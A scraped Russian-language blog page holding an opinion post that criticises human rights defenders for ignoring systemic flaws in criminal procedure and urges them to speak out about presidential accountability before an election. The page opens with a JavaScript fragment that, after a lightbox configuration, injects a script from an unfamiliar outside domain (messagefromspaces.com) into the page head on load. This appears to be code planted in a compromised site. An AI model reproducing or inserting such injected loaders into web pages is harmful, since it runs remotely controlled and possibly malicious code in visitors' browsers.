, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Нет, не тем заняты наши правозащитники

12 Фев

Давно наблюдаю за  работой правозащитных организаций в России, радуюсь  смелым и аргументированным выступлениям правозащитников и огорчаюсь мизерным результатам.

Вот, казалось, что удручающая история https://echo.msk.ru/blog/lev_ponomarev/2146514-echo/     Дмитрия Пчелинцева не может никого оставить равнодушным, но  прочитать её  решилось не более 1 000 читателей Эхо Москвы.

Да, рассказали ещё об одном вопиющем случае работы правоохранительных органов, и что? Разве мало таких рассказов было за последние годы?

СМИ постоянно рассказывают о подобном на протяжении второго десятилетия, но ничего не меняется. И вот, почему?

Правозащитники не замечают, что на законодательном уровне условия для осуществления пыточного судопроизводства существуют в России уже 15 лет.

А, где, когда и кто из правозащитников  возмутился тому, что в стране уже около 70% подсудимых осуждают http://www.cdep.ru/index.php?id=79&item=3834 , не проводя в общем порядке исследование и оценку доказательств, собранных по уголовному делу?

Кто из борющихся за права и свободы россиян, возмутился вынесению обвинительных приговоров, которые не соответствуют требованиям Конституции России и порядку судопроизводства?

Правозащитник знает  - человек, его права и свободы являются высшей ценностью, а их признание, соблюдение и защита — обязанность государства.

Иногда,  на собраниях правозащитников участвует глава государства В. Путин. Но никто из правозащитников, не обратился к гаранту Конституции и не разъяснил ему, что признание обвиняемым своей вины в совершении преступления может быть положено в основу обвинения лишь при подтверждении его виновности совокупностью имеющихся по уголовному делу доказательств (ч. 2 ст. 77 УПК РФ).

Никак не реагируют правозащитники  и на  то, что проводимые исследования доказывают, что на протяжении последних семи лет, ежегодно,  более 9 000 000 пострадавших от преступлений, не получают статус «потерпевший», из-за отказа в возбуждении уголовного дела по различным надуманным основаниям.

Даже Генеральный прокурор Ю. Чайка, публично заявляет о том, что прокурорами миллионами отменяются, как незаконные постановления об отказе в возбуждении уголовного дела. А уважаемая общественность, в лице правозащитников, по этим фактам отмалчивается.

Много раз правозащитники высказывались по такой мере пресечения, как содержание под стражей, но никто не обращал внимания на то, что эта мера пресечения может быть применена только к обвиняемому. Никто не озадачился вопросом: «А  действительно ли лицо совершило то деяние, в котором его обвиняют?»

Конституция России, статья 46, гарантирует каждому судебную защиту его прав и свобод, обжалование в суде решений и действий (или бездействия) органов государственной власти и должностных лиц. Поэтому,  перед избранием меры пресечения, суд обязан проверить исполнение следователем требований ст. 171 УПК РФ, позволяющим выносить постановление о привлечении в качестве обвиняемого только при наличии достаточных доказательств, дающих основания для обвинения.

Десятилетиями этого не делается, под предлогом того, что суд не должен предрешать вопрос о виновности лица, до рассмотрения дела по существу. Но суд и не делает это, проверяя законность постановления о привлечении в качестве обвиняемого, суд не позволяет держать под стражей неправомерно обвинённого. Но этого не происходит и  люди годами пребывают в СИЗО по обвинению в деяниях, которые они не совершали, и никакой защиты от этого произвола нет. Возможно, и потому, что правозащитники по такому неисполнению требований Основного Закона страны отмалчиваются.

Сейчас единственному источнику власти в стране, многонациональному народу, предстоит в очередной раз избрать гаранта Конституции.

Только Вы, уважаемые правозащитники, обладаете достоверными данными, доказывающими, как президентами России исполнялась или не исполнялась обязанность гаранта Конституции.

Только Вы, способны аргументированно рассказать народу, почему за столько лет В. Путин так и не стал гарантом Конституции, подписывал и обнародовал Законы, которые Конституционный Суд РФ признавал не соответствующими Конституции.

Только Вы, способны разъяснить народу, зачем и почему России нужен гарант Конституции, способный установить в стране власть Конституции, обеспеченную её гарантом и правосудием. Иначе ещё жить шесть лет в условиях ничем не умеряемого самовластия.

Прошу Вас, накануне предстоящих выборов  президента и  гаранта Конституции,  сделать это. Хватит историй типа, а вот был ещё случай.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.